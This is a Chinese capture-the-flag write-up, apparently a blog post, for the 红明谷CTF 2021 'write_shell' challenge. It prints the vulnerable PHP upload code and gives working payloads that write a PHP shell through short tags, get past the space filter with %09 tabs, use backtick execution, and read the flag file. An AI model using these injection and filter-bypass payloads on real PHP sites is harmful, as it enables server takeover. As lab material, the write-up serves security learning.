-
[红明谷CTF 2021]write_shell %09绕过过滤空格 ``执行
目录
看看代码
- error_reporting(0);
- highlight_file(__FILE__);
- function check($input){
- if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
- 过滤了 木马类型的东西
- // if(preg_match("/'| |_|=|php/",$input)){
- die('hacker!!!');
- }else{
- return $input;
- }
- }
- function waf($input){
- if(is_array($input)){
- foreach($input as $key=>$output){
- $input[$key] = waf($output);
- 如果是数组 就先变为 变量类型 然后再waf
- }
- }else{
- $input = check($input);
- }
- }
- 这里就是对input 进行waf
- $dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
- 存入 sandbox/md5(当前ip地址)/目录中
- if(!file_exists($dir)){
- mkdir($dir);
- }
- switch($_GET["action"] ?? "") {
- case 'pwd':
- echo $dir;
- break;
- 这里可以看我们当前存入的是哪个目录
- case 'upload':
- $data = $_GET["data"] ?? "";
- waf($data);
- file_put_contents("$dir" . "index.php", $data);
- }
- ?>
还是很简单的
存在两个方式
1.正常短标签
我们经过测试 能发现有一个短标签
没被过滤 可以用于写入php代码
我们可以写入 ls看看 单引号被过滤我们使用双引号
?action=upload&data=<?system("ls")?>然后去访问目录下的index.php
执行成功
我们就可以开始想 我们如果要看根目录 我们需要 ls / 只有空格被过滤了 我们如何绕过
网上一搜一大把
最简单的就是tab urlencode 即 %09
?action=upload&data=<?system("ls%09/")?>
执行 我们同样payload cat一下
2.短标签配合内联执行
?action=upload&data=<?echo%09`ls`?>直接执行
同样的道理访问即可
- ?action=upload&data=<?echo%09`ls%09/`?>
- ?action=upload&data=<?echo%09`cat%09/flllllll1112222222lag`?>
-
相关阅读:
关于 CMS 垃圾回收器,你真的懂了吗?
GIS数据获取:气象数据免费下载网站
HazelEngine 学习记录 - 2D Renderer Transforms and 2D Renderer Textures
cs224w(图机器学习)2021冬季课程学习笔记8
51单片机学习:定时器0实验
tensorrt部署深度学习模型
QT学习总结之QObject详解
如何维护物流中心电力系统?这个方法太炸裂了
.NET C#杂谈(1):变体 - 协变、逆变与不变
在spring boot中调用第三方接口时重试问题
- 原文地址:https://blog.csdn.net/m0_64180167/article/details/133426207
